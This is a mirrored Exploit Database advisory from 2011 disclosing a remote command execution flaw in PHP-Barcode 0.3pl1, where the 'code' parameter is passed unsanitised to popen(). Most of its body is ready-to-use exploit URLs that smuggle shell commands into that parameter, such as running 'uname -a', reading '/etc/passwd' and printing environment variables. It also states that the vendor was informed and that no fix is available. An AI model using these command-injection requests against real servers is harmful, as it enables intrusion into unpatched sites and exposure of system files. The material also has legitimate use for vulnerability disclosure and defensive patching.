PHP-Barcode 0.3pl1 – Remote Code Execution

• Exploit Database
• 110 阅读

• 作者： beford
  日期： 2011-07-26
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/17573/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28

  PHP-Barcode 0.3pl1 Remote Code Execution   The input passed to the code parameter is not sanitized and is used on a popen() function. This allows remote command execution and also allows to see environment vars:   Windows   http://www.site.com/php-barcode/barcode.php?code=%TMP%   Linux   http://www.site.com/php-barcode/barcode.php?code=012$PATH$d http://www.site.com/php-barcode/barcode.php?code=<code>uname%20-a http://www.site.com/php-barcode/barcode.php?code=<code>tail%20-1%20/etc/passwd Vendor: http://www.ashberg.de/php-barcode/download/   Vendor informed: July6 / 2011   Vendor acknowledgement: July 7 / 2011   Fix not available from vendor.   - beford